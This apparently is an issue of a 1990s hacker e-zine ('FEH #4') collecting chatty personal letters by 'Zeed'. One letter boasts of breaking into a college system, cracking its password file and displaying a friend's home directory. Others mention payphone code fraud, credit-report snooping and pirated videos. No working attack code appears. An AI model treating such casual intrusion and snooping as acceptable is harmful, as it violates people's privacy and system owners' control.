I bet you didn't know I was much of a hacker? :) I don't usually talk about hacking with you... Well this morning I was bored, and so I decided to take a look at your school's computer. I was just nosy ;) Anyways, I broke in =P I have the entire password file for your whole college... Mind you though, the passwords are encrypted and so I had to run my different programs on the password file to help me unencrypt it... All I can say is "bravo" you must have picked a good password. ie. one that isn't a word in any language. I couldn't crack yours, if i had I would have just showed you it for amusement that's all ;) I did crack lots of other, not so wise people's passwords.

Hmm, you don't believe me.. That I broke in? =P Here is your home directory with all your files in it ;)

--- /u/s/tgreiner

% ls
mail            textbox.irc
% ls -la
total 307
drwxr-xr-x   3 tgreiner      512 Aug 29 22:12 .
drwxr-xr-x2025 root        36352 Aug 30 09:03 ..
-rw-r--r--   1 tgreiner        0 Aug 27 13:32 .addressbook
-rw-r--r--   1 tgreiner     1257 Aug 27 13:32 .addressbook.lu
-rw-r--r--   1 tgreiner       29 Aug 17  1993 .bash_login
-rw-r--r--   1 tgreiner       25 Aug 17  1993 .bashrc
-rw-r--r--   1 tgreiner       24 Aug 17  1993 .cshrc
-rw-r--r--   1 tgreiner      320 Aug 29 22:13 .history
-rw-------   1 tgreiner        0 Aug 28 21:09 .ircmotd
-rw-r--r--   1 tgreiner       24 Aug 17  1993 .login
-rw-------   1 tgreiner    22925 Aug 27 13:33 .pine-interrupted-mail
-rw-r--r--   1 tgreiner     5433 Aug 29 22:12 .pinerc
-rwxr-xr-x   1 tgreiner       21 Aug 17  1993 .profile
drwx------   2 tgreiner      512 Aug 26 21:11 mail
-rw-r--r--   1 tgreiner   221435 Aug 26 21:05 textbox.irc
%

--------

Now, don't worry :) I am a good boy, I won't do anything bad to this computer :) It's the same deal with that college in Vancouver I might be going to, I already broke into theirs too. I leech stuff off of it, but I have and never will damage it. I am sort of their protector. You have to admit that I am the everyday type of hacker you see in 'hack' , eh? I am just being silly =) But, I get a cookie for being a good hacker don't I? =)

Well I hope things are going good with you.. I hope school is fine :) I sorted out the pictures I am going to send to you... I am going to put some other stuff together, and send it off ;)

Love,
Jean

btw. 'ls' is the command in unix that shows you what files are in your directory ;) I noticed that the only commands you had typed were:

irc
exit
pine

Am I being too nosy? Sorry, hehe. I just had to show off my latest hack =)

-------------------------------------------------------------------------------

My Night With a Narq
by Zeed

Just thought I would say "hi" ;) I went to another NYC 2600 meeting last night, it was a lot of fun :) I swear I might only go out and do something fun once a month, but it's worth it :)

Let's see.. First I hung out there and talked to my friends about the normal hacker stuff, it's kind of neat.
I can see some of the little lamers looking at me in the background looking at me like if I was some sort of hacker god. Here I am with like 6 people around me most of them are at least 10 years older than me and we are all talking about the latest tricks and things. I had my defcon t-shirt too, so I was elite ;)

Anyways, I was there talking and Evian walked by me and rescued me from that crowd. She just walked by me and grabbed my shirt and I thought, hmm, who would I rather talk to right now.... A bunch of middle age hackers or one of my friends, so I left the crowd of hackers. I went with Evian and sat down, I showed her all my pictures from defcon. Now she officially knows what My 2 friends from CA, Jason, Emily, Melanie and Andy Conov look like. It was fun :) I didn't have too many cool pictures.

The one thing that sucked though was that Rage and Plot said that they were both going to show up. They never did though, so Evian and I tried calling up Rage to see what was up. We were like using all these codes and things to try to make calls, the damn payphones kept eating her quarters. hehe, they are getting us back I guess. Well Plot and Rage never did show up, oh well..

Oh, let's see, who else was there.... Do you know Cameo (Davi, mistressx, etc) she was there all the way down from Mass. (6 hours away). She was nice to talk to, she was a lot more prettier than her friends would tell me. I didn't talk to her though a lot, between me and you, she is sort of a hacker groupie I think. She just goes to whoever seems most 'elite', that's how I met her originally. I was on aol a couple weeks ago and KT, Next, and some others were like calling me the god of the internet, etc... Odd, enough I got an IM from her a couple minutes later, and I ended up calling her. I am not saying that she isn't a very sweet person, it's just I wasn't always so 'elite' or knowledgeable and people would never want to talk to me and my friends.
Now it's funny, it's like people just want to 'know' me. I did talk to her a while, but she mostly talked about hacking. I really would usually talk about other things than computers with my friends, hehe, they are so boring ;)

Let's see, Evian is much more sincere of a person. We both sit there making fun of the "elite" people walking around the meeting. She is neat =)

Hmm, I met another girl there, maybe not as old as Evian (like 28) but maybe a little younger. I don't know why she wanted to start talking to me, maybe it's my new hair cut ;) She was interesting though, she like sets up WWW servers and environments, which I thought was cool because that's what I am sort of trying to do. (Trying, because it requires $$$) I think I am becoming more comfortable about meeting people and meeting women (I am very shy), but I was kind of surprised she started talking to me. If I do move to Vancouver in January (it's very likely) I am going to miss these people, they are so nice, all of them.. I hate moving =`(

My friend that I like see every month (The OMNI magazine reporter) was there again. He talked to me a little while, hmm, maybe he is writing a book on me ;) He like mostly talks to me.. hmm. There was also a NY Times reporter there with her photographer. My friend PMF (He is originally from Britain) went off on hacking for like 30 minutes talking to this reporter. Talking about the difference between hacking and phreaking, he was having his day in the sun. He has got to be one of the most knowledgeable people I know when it comes to hacking. I bet he is going to be all over the NY Times.

Then the photographer was going crazy with taking pictures.. This other guy I know "Dennis" (Elite entity, he is probably one of the most notorious hackers here other than Phiber Optik) started really harassing the photographer, he was telling me how pissed he was at her taking pictures. He was also VERY drunk, I left right when she called a security guard on him. I wonder what happened.
Anyways, PMF, DTMF and I all went to McDonald's (It's three stories high). I talked with them about all sorts of things, PMF seems to know just about everything :) He could pull credit reports, change your phone number, find out all kinds of goodies ;) He got busted though for breaking into a System 75, so he is a lot more cautious.

We went back to the meeting after McDonald's but everybody was gone.. So DTMF took his subway, and I went with PMF on the subway to 42nd Street. Now if you know about NY you know about 42nd, you can pretty much get anything there. It has like a bunch of adult theaters and movie stores on it. Anyways, we went there to go get some pirated movies. PMF knew 2 places there that had movies like Mortal Kombat and Clueless already on tape. I bought Mortal Kombat for $10 just to see what the quality would be like, it's more of a novelty item for me. PMF got a couple movies. BTW, PMF is 24.

Hmm, I don't know if I should tell you this ;) We did go into an adult movie place, he was like looking for a particular movie.. I just followed him in. I was sort of amazed at how much of that stuff they sell in there. They had 1000s of videos, umm, and a bunch of weird other things, some I have yet to figure out ;) We didn't stay long, and I don't even know if I was old enough to be in there, but really didn't care. I was in NY just to have fun and to get out. I think they were ready to card PMF, but they never really looked at me. Hmm, must be all that facial hair ;)

Anyways, after 42nd St, we took a subway to our train. We almost went on the wrong train!! We were there sitting on the wrong train for like 30 minutes. 2 girls came on the train and asked us if this was the train to Morristown. PMF says "No this goes to Suffern NY, but you can come with us" He is such a joker :) So they got off that train..
10 minutes later the 2 girls come back and say "Umm, This train is going to Morristown, but you guys can come with US" (hehe, role reversal) So we got off that train and jumped on the right train. Soon we were off, PMF got off at the 3rd stop. I stayed on till my stop which was a lot farther down.

I had lots of fun :) hehe, my life is so meager isn't it? ;) All I did was hang out, go to McDonald's and buy a pirated video. Well I did meet some new people.. But, that's all it took for me to have fun ;)

Well, I am going to have these pictures duplicated soon. Would you like a picture of me too? I have some of me at defcon, but they aren't terribly good. I hope everything is going well for you, and all that school work isn't killing you.

Love,
Jean

------------------------------------------------------------------------------

Creating Your Own Startup Computer Company
by Zeed

I was bored out of my mind in math class.... So I started designing my company out ;) I could bore you with all the technical stuff, I will spare you. I started designing the logo, the corporate headquarters, everything ;) I am going to do business in Europe, Taiwan and Japan. The reception area to the company is going to be a big room, with arcade games lined up on both sides, and a huge "Zeed Enterprises" logo painted on the floor. I have like everything planned out. I even have a list of people I need to hire to work for me. programmers, artists, musicians, etc :)

    Zeed Enterprises,
    Software development for the: PSX, Saturn, SNES, Genesis, Win '95, Amiga 4000, UNIX.
    Internet service provider and www server provider.
    UNIX security analysis and auditing services.

That's like what my business card will say ;) All of this pretty much hinges on if I get accepted to that school in Vancouver, Canada. If I don't, I am going to probably go more heavily into just Sega Saturn and UNIX and Unix security. Look out Acclaim, Sega and Nintendo =P Here I come :) ok, there was my grandiose delusion.
It's going to happen though >=) That or something better. I have very high goals for myself, when I don't achieve them I get depressed. I am imagining this all in Southern CA, maybe Northern CA.

Hmm, well today I am going to get some things done.. I have to finish two programs for this school in Vancouver (I am going to brag to them =P) One program is a small game, and the other is a 3-D demo I am working on (right now it's just all in my head). The little game is about 75% done. The game is written in C, and I haven't decided if I am going to write the demo in Intel assembly language or in C. Yuck!! floating point math and trig in Assembly, ahhh!! shhh, don't get mad at me, I am just getting corny, I know you could care less about floating point math ;)

Well my 486 is running, so I am in the slow rebuilding process. Oh the joys of PCs. My next computer will be a Silicon Graphics workstation, hell with this microsoft crap ;) umm, I am talking about computers too much... I think I will interrogate you >=) What type of music do you like? Did you ever have pink fuzzy bunny slippers when you were a kid? some interrogation... So much for my lawyer career.

Guess what? My dad is in Saudi Arabia right now =P Talk about long distance calling.

Sorry about not pestering you for the last couple days... I couldn't use AOL or anything, not even Windows. So I was unable to bug you with my ever so timely email. I'll make it up to you though, I promise. Did you miss me while I was gone? I thought so.. :) hehehe When I go away for extended periods of time everybody misses me. Then a couple days later after I come back, they wish I'd leave again =)

You know, every time I think of your real name, I think of "bewitched". Nooo, don't hit me, I know that I am probably like the 1 millionth person to say that to you. I just had to say it ;)

Well, I must leave now... I do believe I have work to do if I am to start a company in 2 years.

a bien tot.
Jean

John, John, the leprechaun, went to school with nothing on.......... (I hated that stupid saying, I heard it like every day in first grade)

------------------------------------------------------------------------------

Graphics Research
by Zeed

What's new? Man, I have been programming all day long. I woke up this morning and before I even opened my eyes, I was thinking about this program I wrote. It had a major bug in it, so I was debugging it in my head. I fixed the bug in my head, opened my eyes and grabbed a piece of paper and wrote the entire sub-routine for this new function. This function rotates a 40 by 80 pixel box and maps it into a 100 by 100 box. So I had to develop an algorithm that would rotate the entire image according to how many degrees I tell it to rotate. This involved some trigonometry. Here I will show off to you what I wrote this morning, right when I woke up ;)

----------------------
int rx,ry;
float cx,cy;
float sx,sy;
int sxx,syy;
unsigned char col;
float cc,ss; /* cosine and sine value so we don't have to calculate more than once */

for(rx=0;rx<10000;rx++) swap[rx]=0; // clear out buffer
angle+= .1;
for(ry=0;ry<40;ry++){
  for(rx=0;rx<80;rx++){
    col= buf[ry*80+rx];
    if (col!=0) { /* don't rotate if pixel has no color */
      cy= 20 - ry;
      cx= rx - 40;
      cc= cos(angle);
      ss= sin(angle);
      sx= cx * cc - cy * ss;
      sy= cy * cc - cx * ss;
      sxx= sx + 50;
      syy= 100 - sy - 50;
      swap[syy*100+sxx]= col;
      //vmem[(((syy+16)<<8)+((syy+16)<<6))+sxx+17]= col; //to bypass plotbk
    }
  }
}
---------------------------------

yeah, I am sure you understood all of it ;) This is C by the way.

umm, btw. An admin at your college found out about me about an hour ago. He just kicked me off and changed my password. oh well :) where was I? oh yes, the algorithm.. Would you believe there is still a bug in it somewhere, ahhhhh, I hate debugging. I guess that means I should just write bug free code.

A weird thing happened on AOL today, I met two girls one right after another..
Both IMed me first and both just started talking to me. I am becoming sort of a famous person, hmm, like you :) hehehe. I think you have heard of both of them, what's weird though is that I did not know either before today. Just heard of them. Quagmire and Jill from TX. Quagmire is nice. Jill, well she is just a kid, and besides, I thought I remember hearing stuff about her a while back ;) It never hurts to meet new faces though, that's just my little story though. I popped into 'hack' for a second and I get people IMing me. I usually ignore all the guys, unless I know them. Sheeesh, me and my online friends, I am just going to get myself into another bad situation. I swear, I am building this like huge library of pics of my friends, hehehe.

I guess I am not going to be seeing "hackers" this weekend. Evian called me last night and said she was doing stuff with her family or something this weekend. Oh well :) Will you come with me to see it? hey, it's the thought that counts :)

I am going to play psychologist for a second. Tell me if I am wrong. I get this feeling about you... Like you like talking to people online and stuff, and being their friends because it's online only. You don't have to worry about anything else, and they are there whenever you need them. I am not saying that you don't have or like friends in the flesh world. I am just thinking out loud. Do you like the thought of ever meeting anybody you have met online in person? or does that scare you somewhat, or maybe you think it will shatter your own little make-believe world. I am just curious. I was doing a lot of thinking on my part about myself. Please do not take this the wrong way. I could have asked it to anybody. I am just like I said, coming up with theories and pondering them ;) I am just wondering what your opinion is.

My sympathies are with you... (all that homework)

Take care..

<---------------------------------------------------------------------------->

Thus concludes FEH #4.
See you again in a month or two.